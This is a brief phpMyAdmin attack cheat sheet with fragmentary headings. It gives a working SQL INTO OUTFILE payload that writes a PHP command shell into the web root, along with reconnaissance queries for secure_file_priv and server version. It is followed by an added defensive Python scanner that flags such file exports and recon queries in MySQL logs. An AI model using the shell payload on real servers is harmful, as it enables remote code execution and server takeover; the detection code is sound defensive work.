phpMyAdmin Hacktricks
Cross-Site Request Forgery can modify the server’s configuration, leading to RCE.
The oldest trick: write a PHP shell into the web root.
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"
Requirements:
Check secure_file_priv:
SHOW VARIABLES LIKE "secure_file_priv";
Exploits ?target=db_datadict.php chained with a crafted SQL query.
Steps: Requirements:
Once inside, the attacker checks SELECT @@version, SELECT @@secure_file_priv, and SHOW VARIABLES LIKE 'basedir'.
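
A defender-side view of the INTO OUTFILE write and the post-login variable checks described above, as an added example that is not part of the original page: a Python scan of MySQL general query log lines for file exports and the lookups that precede them, plus a classifier for the secure_file_priv setting. The log line layout, the web-root list and the function names are assumptions, and the sample lines are constructed.

```python
import re

# Assumed web roots to watch; adjust to the server's actual document roots.
WEB_ROOTS = ("/var/www/", "/usr/share/nginx/", "/srv/www/")

OUTFILE_RE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+(['\"])(?P<path>.+?)\1", re.I)
RECON_RE = re.compile(r"@@(?:global\.)?(?:version|secure_file_priv)\b"
                      r"|SHOW\s+VARIABLES\s+LIKE\s+['\"](?:secure_file_priv|basedir)['\"]", re.I)


def secure_file_priv_risk(value):
    """Map a secure_file_priv setting to its file-export exposure."""
    if value is None or value.upper() == "NULL":
        return "disabled"          # import/export operations are refused
    if value == "":
        return "unrestricted"      # server may write anywhere the OS user can
    if value.startswith(WEB_ROOTS):
        return "web-root"          # exports land where the web server serves files
    return "restricted"


def scan_queries(lines):
    """Return (line_no, severity, reason) for each suspicious logged statement."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = OUTFILE_RE.search(line)
        if m:
            path = m.group("path")
            in_web = path.startswith(WEB_ROOTS)
            script = path.lower().endswith((".php", ".phtml", ".phar"))
            sev = "high" if in_web or script else "medium"
            findings.append((no, sev, f"file export to {path}"))
        elif RECON_RE.search(line):
            findings.append((no, "low", "file-write reconnaissance query"))
    return findings


# Constructed sample of MySQL general-query-log lines (not from a real server).
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z 12 Query SELECT @@version",
    "2024-01-01T10:00:02Z 12 Query SHOW VARIABLES LIKE 'secure_file_priv'",
    "2024-01-01T10:00:03Z 12 Query SELECT id, name FROM shop.products",
    "2024-01-01T10:00:05Z 12 Query SELECT \"<?php ... ?>\" INTO OUTFILE \"/var/www/html/shell.php\"",
    "2024-01-01T10:00:09Z 15 Query SELECT * FROM t INTO OUTFILE '/var/lib/mysql-files/t.csv'",
]

if __name__ == "__main__":
    for finding in scan_queries(SAMPLE_LOG):
        print(finding)
```

A secure_file_priv value of NULL (the "disabled" result) makes the server refuse the INTO OUTFILE write entirely; an empty value leaves it limited only by the filesystem permissions of the MySQL OS account.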